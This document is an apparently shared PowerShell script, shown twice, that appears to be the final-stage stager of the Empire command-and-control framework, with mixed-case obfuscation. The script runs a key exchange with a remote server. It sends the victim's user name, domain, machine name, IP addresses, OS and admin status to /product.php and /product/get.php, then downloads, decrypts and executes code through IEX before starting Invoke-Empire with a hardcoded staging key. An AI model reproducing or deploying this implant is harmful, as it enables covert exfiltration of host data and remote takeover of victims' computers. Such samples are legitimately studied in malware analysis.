JohnHammond/final_stage_powershell.ps1 Secret

## final_stage_powershell.ps1
FunctioN StARt-NEgOTiAte {
	PaRaM($s,$SK,$UA='MOZiLlA/5.0 (WiNdOWS NT 10.0; WIN64; X64) APPleWeBKiT/537.36 (KHTML, LIke GEcKo) CHrome/91.0.4472.124 SAFArI/537.36',$hOp)

    fUnctiON COnvErTTO-RC4ByTESTReAM {
	   PArAM ($RCK, $In)

       BeGiN {
	       [BYtE[]] $STR = 0..255;
            $J = 0;
            0..255 | FOREAch-OBjeCT {
	           $J = ($J + $StR[$_] + $RCK[$_ % $RCK.LEngTh]) % 256;
                $StR[$_], $STR[$J] = $Str[$J], $STr[$_];
            };
            $I = $J = 0;
        }PRocesS {
	       FoREAcH($BytE iN $In) {
                $I = ($I + 1) % 256;
                $J = ($J + $Str[$I]) % 256;
                $StR[$I], $Str[$J] = $STr[$J], $Str[$I];
                $BYTE -bxOr $StR[($Str[$I] + $StR[$J]) % 256];
            }
        }
    }

    functiOn DEcRYpt-BYtes {
	   paraM ($Key, $IN)

       IF($IN.LeNgtH -gt 32) {
            $HMAC = New-ObJeCt SyStem.SEcurIty.CRYPtogRaPHy.HMACSHA256;
            $E=[System.TexT.ENCodinG]::ASCII;
            $MAc = $In[-10..-1];
            $In = $IN[0..($In.LenGtH - 11)];
            $Hmac.KEY = $E.GeTByTES($KEY);
            $ExPECTeD = $hmAc.ComPUtEHaSH($IN)[0..9];

            if (@(COmPArE-ObJEcT $MaC $EXPECTED -SynC 0).LeNGth -NE 0) {
	           REtURn;
            }
            $IV = $In[0..15];

            Try {
	           $AES=NeW-OBJect SySteM.SecuRiTY.CRYPtOGRAphY.AeSCrYptoSERviCeProvIdER;
            }CaTCh {
	           $AES=NeW-ObJecT SYsTEM.SEcuRiTY.CRYPToGrapHY.RijndaelManaGeD;
            }

            $AES.Mode = "CBC";
            $AES.KEY = $E.GEtByTEs($KEY);

            $AES.IV = $IV;
            ($AES.CREaTeDecrYpTOr()).TransformFiNALBlock(($IN[16..$In.LeNGth]), 0, $IN.LeNgtH-16)
        }
    }

    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");


    $ErrorActionPreference = "SilentlyContinue";

    $e=[SYSTEm.TexT.ENCOdING]::UTF8;

    $customHeaders = "";

    $SKB=$E.GeTByTes($SK);

    try {
    	$AES=NeW-ObJEct SyStEm.SecuriTy.CRypTographY.AESCRYPTOSERVIcEPROViDER;
    }CaTCH {
    	$AES=New-ObJeCt SysTem.SECURItY.CRYptOGRApHy.RijNdAELManaGEd;
    }

    $IV = [bYte] 0..255 | GeT-RANDoM -CouNt 16;
    $AES.Mode="CBC";
    $AES.Key=$SKB;
    $AES.IV = $IV;
    $HMac = NeW-ObJEct SyStEM.SecuriTy.CRYpTOGRAPHy.HMACSHA256;
    $hmAc.Key = $SKB;

    $CSp = NeW-OBjEct SYSTEM.SecUriTY.CryptOGRAphY.CSpPARamEters;

    $cSp.FlAGs = $CSp.FLaGS -bOr [SysTem.SecuRitY.CrYpToGRaPHy.CSpPRoVIDerFlags]::UsEMacHinEKEySTore;

    $rS = NeW-ObJEct SysTEm.SeCURItY.CRYpTOGrAPhY.RSACrYPtoServIcEPrOVidEr -ARGuMENTLIST 2048,$csp;
    $Rk=$rS.ToXmLStRiNG($FalSe);
    $ID=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray()|Get-Random -Count 8);
    $IB=$E.gEtbytEs($Rk);
    $eb=$IV+$AES.CReATeENCRYPTOR().TraNSfORmFINALBlOCK($Ib,0,$Ib.LENGTh);
    $eB=$eB+$HMac.COMPuteHasH($eb)[0..9];

    IF(-nOT $WC) {
	   $wC=NEW-ObJEct SySTem.Net.WebCLIeNt;
        $Wc.PROXY = [SYSTEm.NEt.WeBReQuEST]::GeTSYStemWebProxY();
        $wC.PRoXY.CrEDENtiaLS = [SYsTem.Net.CrEdenTiAlCacHE]::DeFAUlTCRedeNtiAls;
    }
    iF ($SCRIpt:PrOxy) {
	   $wC.PRoXy = $SCrIpT:ProXy;
    }
    if ($customHeaders -ne "") {
        $HEaderS = $cUsToMHeaDERs -SPLIT ',';
        $HeaDerS | FOREAcH-ObjEcT {
        	$hEaDeRKey = $_.SPLIt(':')[0];
            $hEaDeRVaLUe = $_.SPLiT(':')[1];

            if ($headerKey -eq "host"){
    	       TRY{
    	           $iG=$WC.DOWNLoADDAtA($S)
                }caTch{}
            };

            $wc.HeaDeRs.Add($hEAdErKeY, $heaDeRValue);
        }
    }

    $wc.Headers.Add("User-Agent",$UA);
    $IV=[BItCOnVeRTEr]::GetBYTEs($(GeT-RaNdOM));
    $DATa = $e.geTBYTEs($ID) + @(0x01,0x02,0X00,0x00) + [BITCONVERTeR]::GetByTES($eB.LenGth);
    $rc4p = CoNVERTTO-RC4ByTEStREaM -RCK $($IV+$SKB) -IN $Data;
    $rC4P = $IV + $rC4p + $Eb;
    $raw=$wc.UploadData($s+"/product.php","POST",$rc4p);
    $de=$e.GEtSTRiNG($RS.DEcRypt($rAW,$falSe));
    $nonCe=$De[0..15] -JOiN '';
    $Key=$dE[16..$DE.LenGTh] -JoIN '';
    $noncE=[StRinG]([lOnG]$NOnCE + 1);

    tRY {
	   $AES=NeW-OBJEcT System.SECUrIty.CrYPToGraPhY.AeSCRYpToSErVICePROviDer;
    }caTCh {
	   $AES=NEW-ObJecT SySTem.SEcUrIty.CRYptoGRaphy.RIjnDAElMANAGed;
    }

    $IV = [Byte] 0..255 | GET-RaNDOm -COUNT 16;
    $AES.Mode="CBC";
    $AES.Key=$e.GetBYteS($KEy);
    $AES.IV = $IV;
    $I=$nONce+'|'+$S+'|'+[ENVIrOnMeNT]::USeRDoMainNAME+'|'+[EnvirONMent]::UsERNaME+'|'+[ENViRonmENt]::MACHiNENAmE;

    trY{
	   $P=(gwmI WIn32_NeTworkAdApTeRCoNFiGurAtion|WheRE{ $_.IPAdDrEsS}|SELEcT -ExpAnd IPAddRess);
    }CaTCH {
	   $p = "[FAILED]"
    }

    $IP = @{
            $TRUe=$p[0];
            $FaLse=$P
        }[$P.LEnGTH -lT 6];

    iF(!$ip -or $ip.tRIM() -Eq '') {
	   $Ip='0.0.0.0'
    };

    $i+="|$ip";
    TrY{
	   $i+='|'+(GeT-WmIObjeCT WIN32_OPEratiNGSYSTEM).NaME.SplIT('|')[0];
    }
    CAtch{
	   $I+='|'+'[FAILED]'
    }

    if(([Environment]::UserName).ToLower() -eq "system"){

	   $i+="|True"
    }else {
        $i += '|' +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
        }
        $N=[SYsTeM.DiAGnOstICs.PrOCEsS]::GetCURReNTProCEss();
        $I+='|'+$n.PRocEssNAMe+'|'+$N.Id;
        $i += "|powershell|" + $PSVersionTable.PSVersion.Major;
        $Ib2=$e.GETbYTES($I);

        $Eb2=$IV+$AES.CReatEEncrYpTor().TranSformFiNAlBLOCk($IB2,0,$iB2.LeNgtH);
        $HMAC.KEy = $e.GETByTeS($Key);
        $EB2 = $eB2+$HMaC.CoMPuteHAsH($Eb2)[0..9];
        $IV2=[BitConVerTeR]::GEtBYtes($(GeT-RanDoM));
        $DaTa2 = $E.GeTbyTeS($ID) + @(0x01,0x03,0X00,0x00) + [BitCONverTeR]::GEtBYTES($EB2.LeNGTH);

        $rC4P2 = ConVeRtTO-RC4BYTeSTReAM -RCK $($IV2+$SKB) -IN $DAtA2;
        $RC4p2 = $IV2 + $RC4P2 + $eb2;
        if ($customHeaders -ne "") {
            $hEadeRS = $cuStOmHEaDERs -sPliT ',';
            $HEadERs | FOREAch-ObjEct {
                $HeaDErKEY = $_.SPLit(':')[0];
                $HeAderVAlue = $_.sPliT(':')[1];
                if ($headerKey -eq "host"){
	               tRY{
	                   $ig=$WC.DOwNloAdDAta($s)
                    }CATCH{}
                };
            $Wc.HEaDeRS.Add($HeadErKEy, $HEadERValUE);
            }
        }

        $wc.Headers.Add("User-Agent",$UA);
        $wc.Headers.Add("Hop-Name",$hop);

        $raw=$wc.UploadData($s+"/product/get.php","POST",$rc4p2);

        IEX $( $e.GETSTRiNG($(DecrypT-ByTEs -Key $KeY -IN $RaW)) );

        $AES=$nULl;
        $s2=$NuLL;
        $wc=$nULL;
        $eb2=$Null;
        $rAW=$nULl;
        $IV=$NuLL;
        $Wc=$NuLl;
        $i=$NUll;
        $ib2=$nuLl;
        [GC]::CollEcT();

        Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;

        }
Start-Negotiate -s "$ser" -SK 'o=^@H*v#qh(jNBt%X]MpTbQZ&[_-.)J?' -UA $u -hop "$hop"
	FunctioN StARt-NEgOTiAte {
	PaRaM($s,$SK,$UA='MOZiLlA/5.0 (WiNdOWS NT 10.0; WIN64; X64) APPleWeBKiT/537.36 (KHTML, LIke GEcKo) CHrome/91.0.4472.124 SAFArI/537.36',$hOp)

	fUnctiON COnvErTTO-RC4ByTESTReAM {
	PArAM ($RCK, $In)

	BeGiN {
	[BYtE[]] $STR = 0..255;
	$J = 0;
	0..255 \| FOREAch-OBjeCT {
	$J = ($J + $StR[$_] + $RCK[$_ % $RCK.LEngTh]) % 256;
	$StR[$_], $STR[$J] = $Str[$J], $STr[$_];
	};
	$I = $J = 0;
	}PRocesS {
	FoREAcH($BytE iN $In) {
	$I = ($I + 1) % 256;
	$J = ($J + $Str[$I]) % 256;
	$StR[$I], $Str[$J] = $STr[$J], $Str[$I];
	$BYTE -bxOr $StR[($Str[$I] + $StR[$J]) % 256];
	}
	}
	}

	functiOn DEcRYpt-BYtes {
	paraM ($Key, $IN)

	IF($IN.LeNgtH -gt 32) {
	$HMAC = New-ObJeCt SyStem.SEcurIty.CRYPtogRaPHy.HMACSHA256;
	$E=[System.TexT.ENCodinG]::ASCII;
	$MAc = $In[-10..-1];
	$In = $IN[0..($In.LenGtH - 11)];
	$Hmac.KEY = $E.GeTByTES($KEY);
	$ExPECTeD = $hmAc.ComPUtEHaSH($IN)[0..9];

	if (@(COmPArE-ObJEcT $MaC $EXPECTED -SynC 0).LeNGth -NE 0) {
	REtURn;
	}
	$IV = $In[0..15];

	Try {
	$AES=NeW-OBJect SySteM.SecuRiTY.CRYPtOGRAphY.AeSCrYptoSERviCeProvIdER;
	}CaTCh {
	$AES=NeW-ObJecT SYsTEM.SEcuRiTY.CRYPToGrapHY.RijndaelManaGeD;
	}

	$AES.Mode = "CBC";
	$AES.KEY = $E.GEtByTEs($KEY);

	$AES.IV = $IV;
	($AES.CREaTeDecrYpTOr()).TransformFiNALBlock(($IN[16..$In.LeNGth]), 0, $IN.LeNgtH-16)
	}
	}

	$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
	$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");


	$ErrorActionPreference = "SilentlyContinue";

	$e=[SYSTEm.TexT.ENCOdING]::UTF8;

	$customHeaders = "";

	$SKB=$E.GeTByTes($SK);

	try {
	$AES=NeW-ObJEct SyStEm.SecuriTy.CRypTographY.AESCRYPTOSERVIcEPROViDER;
	}CaTCH {
	$AES=New-ObJeCt SysTem.SECURItY.CRYptOGRApHy.RijNdAELManaGEd;
	}

	$IV = [bYte] 0..255 \| GeT-RANDoM -CouNt 16;
	$AES.Mode="CBC";
	$AES.Key=$SKB;
	$AES.IV = $IV;
	$HMac = NeW-ObJEct SyStEM.SecuriTy.CRYpTOGRAPHy.HMACSHA256;
	$hmAc.Key = $SKB;

	$CSp = NeW-OBjEct SYSTEM.SecUriTY.CryptOGRAphY.CSpPARamEters;

	$cSp.FlAGs = $CSp.FLaGS -bOr [SysTem.SecuRitY.CrYpToGRaPHy.CSpPRoVIDerFlags]::UsEMacHinEKEySTore;

	$rS = NeW-ObJEct SysTEm.SeCURItY.CRYpTOGrAPhY.RSACrYPtoServIcEPrOVidEr -ARGuMENTLIST 2048,$csp;
	$Rk=$rS.ToXmLStRiNG($FalSe);
	$ID=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray()\|Get-Random -Count 8);
	$IB=$E.gEtbytEs($Rk);
	$eb=$IV+$AES.CReATeENCRYPTOR().TraNSfORmFINALBlOCK($Ib,0,$Ib.LENGTh);
	$eB=$eB+$HMac.COMPuteHasH($eb)[0..9];

	IF(-nOT $WC) {
	$wC=NEW-ObJEct SySTem.Net.WebCLIeNt;
	$Wc.PROXY = [SYSTEm.NEt.WeBReQuEST]::GeTSYStemWebProxY();
	$wC.PRoXY.CrEDENtiaLS = [SYsTem.Net.CrEdenTiAlCacHE]::DeFAUlTCRedeNtiAls;
	}
	iF ($SCRIpt:PrOxy) {
	$wC.PRoXy = $SCrIpT:ProXy;
	}
	if ($customHeaders -ne "") {
	$HEaderS = $cUsToMHeaDERs -SPLIT ',';
	$HeaDerS \| FOREAcH-ObjEcT {
	$hEaDeRKey = $_.SPLIt(':')[0];
	$hEaDeRVaLUe = $_.SPLiT(':')[1];

	if ($headerKey -eq "host"){
	TRY{
	$iG=$WC.DOWNLoADDAtA($S)
	}caTch{}
	};

	$wc.HeaDeRs.Add($hEAdErKeY, $heaDeRValue);
	}
	}

	$wc.Headers.Add("User-Agent",$UA);
	$IV=[BItCOnVeRTEr]::GetBYTEs($(GeT-RaNdOM));
	$DATa = $e.geTBYTEs($ID) + @(0x01,0x02,0X00,0x00) + [BITCONVERTeR]::GetByTES($eB.LenGth);
	$rc4p = CoNVERTTO-RC4ByTEStREaM -RCK $($IV+$SKB) -IN $Data;
	$rC4P = $IV + $rC4p + $Eb;
	$raw=$wc.UploadData($s+"/product.php","POST",$rc4p);
	$de=$e.GEtSTRiNG($RS.DEcRypt($rAW,$falSe));
	$nonCe=$De[0..15] -JOiN '';
	$Key=$dE[16..$DE.LenGTh] -JoIN '';
	$noncE=[StRinG]([lOnG]$NOnCE + 1);

	tRY {
	$AES=NeW-OBJEcT System.SECUrIty.CrYPToGraPhY.AeSCRYpToSErVICePROviDer;
	}caTCh {
	$AES=NEW-ObJecT SySTem.SEcUrIty.CRYptoGRaphy.RIjnDAElMANAGed;
	}

	$IV = [Byte] 0..255 \| GET-RaNDOm -COUNT 16;
	$AES.Mode="CBC";
	$AES.Key=$e.GetBYteS($KEy);
	$AES.IV = $IV;
	$I=$nONce+'\|'+$S+'\|'+[ENVIrOnMeNT]::USeRDoMainNAME+'\|'+[EnvirONMent]::UsERNaME+'\|'+[ENViRonmENt]::MACHiNENAmE;

	trY{
	$P=(gwmI WIn32_NeTworkAdApTeRCoNFiGurAtion\|WheRE{ $_.IPAdDrEsS}\|SELEcT -ExpAnd IPAddRess);
	}CaTCH {
	$p = "[FAILED]"
	}

	$IP = @{
	$TRUe=$p[0];
	$FaLse=$P
	}[$P.LEnGTH -lT 6];

	iF(!$ip -or $ip.tRIM() -Eq '') {
	$Ip='0.0.0.0'
	};

	$i+="\|$ip";
	TrY{
	$i+='\|'+(GeT-WmIObjeCT WIN32_OPEratiNGSYSTEM).NaME.SplIT('\|')[0];
	}
	CAtch{
	$I+='\|'+'[FAILED]'
	}

	if(([Environment]::UserName).ToLower() -eq "system"){

	$i+="\|True"
	}else {
	$i += '\|' +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
	}
	$N=[SYsTeM.DiAGnOstICs.PrOCEsS]::GetCURReNTProCEss();
	$I+='\|'+$n.PRocEssNAMe+'\|'+$N.Id;
	$i += "\|powershell\|" + $PSVersionTable.PSVersion.Major;
	$Ib2=$e.GETbYTES($I);

	$Eb2=$IV+$AES.CReatEEncrYpTor().TranSformFiNAlBLOCk($IB2,0,$iB2.LeNgtH);
	$HMAC.KEy = $e.GETByTeS($Key);
	$EB2 = $eB2+$HMaC.CoMPuteHAsH($Eb2)[0..9];
	$IV2=[BitConVerTeR]::GEtBYtes($(GeT-RanDoM));
	$DaTa2 = $E.GeTbyTeS($ID) + @(0x01,0x03,0X00,0x00) + [BitCONverTeR]::GEtBYTES($EB2.LeNGTH);

	$rC4P2 = ConVeRtTO-RC4BYTeSTReAM -RCK $($IV2+$SKB) -IN $DAtA2;
	$RC4p2 = $IV2 + $RC4P2 + $eb2;
	if ($customHeaders -ne "") {
	$hEadeRS = $cuStOmHEaDERs -sPliT ',';
	$HEadERs \| FOREAch-ObjEct {
	$HeaDErKEY = $_.SPLit(':')[0];
	$HeAderVAlue = $_.sPliT(':')[1];
	if ($headerKey -eq "host"){
	tRY{
	$ig=$WC.DOwNloAdDAta($s)
	}CATCH{}
	};
	$Wc.HEaDeRS.Add($HeadErKEy, $HEadERValUE);
	}
	}

	$wc.Headers.Add("User-Agent",$UA);
	$wc.Headers.Add("Hop-Name",$hop);

	$raw=$wc.UploadData($s+"/product/get.php","POST",$rc4p2);

	IEX $( $e.GETSTRiNG($(DecrypT-ByTEs -Key $KeY -IN $RaW)) );

	$AES=$nULl;
	$s2=$NuLL;
	$wc=$nULL;
	$eb2=$Null;
	$rAW=$nULl;
	$IV=$NuLL;
	$Wc=$NuLl;
	$i=$NUll;
	$ib2=$nuLl;
	[GC]::CollEcT();

	Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;

	}
	Start-Negotiate -s "$ser" -SK 'o=^@H*v#qh(jNBt%X]MpTbQZ&[_-.)J?' -UA $u -hop "$hop"